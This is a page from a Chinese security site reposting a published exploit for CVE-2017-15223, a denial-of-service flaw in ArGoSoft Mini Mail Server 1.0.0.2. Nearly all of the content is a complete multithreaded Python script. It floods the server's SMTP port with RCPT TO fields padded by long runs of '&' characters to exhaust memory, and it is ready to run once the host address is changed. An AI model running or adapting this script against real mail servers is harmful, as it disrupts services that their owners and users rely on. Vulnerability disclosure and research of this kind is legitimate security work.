首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service
来源:bgoksel.com 作者:Berk 发布时间:2017-10-24  
#!/usr/bin/env python
# coding: utf-8
 
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
#
# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2
# and earlier allows remote attackers to waste CPU resources (memory
# consumption) via unspecified vectors.
####################################
 
# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption)
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.argosoft.com
# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx
# Version:  1.0.0.2
# Tested on: Windows 10
# Category: Windows Remote Denial-of-Service
# CVE : CVE-2017-15223
 
 
import socket
from threading import Thread
 
def data():
 
    ip = '127.0.0.1'
    port = 25
    counter = 50
    string = '&'
 
    while True:
        try:
            if counter >= 10000:
                counter = 0
            else:
 
                counter = counter + 50
                A = (string * counter) + 'user2@othermail.com'
                print "String lenght: " + str(len(A))
 
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(5.0)
                sock.connect((ip, port))
                sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n')
                sock.recv(1024)
                sock.close()
 
        except Exception as e:
            continue
 
def main():
    iterations = int(input("Threads: "))
    for i in range(iterations):
        t = Thread(target=data)
        t.start()
 
if __name__ == '__main__':
    main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ayukov NFTP FTP Client < 2.0 -
·Kaltura < 13.1.0 - Remote Code
·Unitrends UEB 9 HTTP API/Stora
·Linux Kernel 4.14.0-rc4+ - 'wa
·Unitrends UEB bpserverd Authen
·Mikogo 5.4.1.160608 - Local Cr
·Polycom Command Shell Authoriz
·Easy MPEG/AVI/DIVX/WMV/RM To D
·TP-Link WR940N Remote Code Exe
·Netgear DGN1000 Setup.cgi Remo
·Hashicorp vagrant-vmware-fusio
·Check_MK 1.2.8p25 - Informatio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved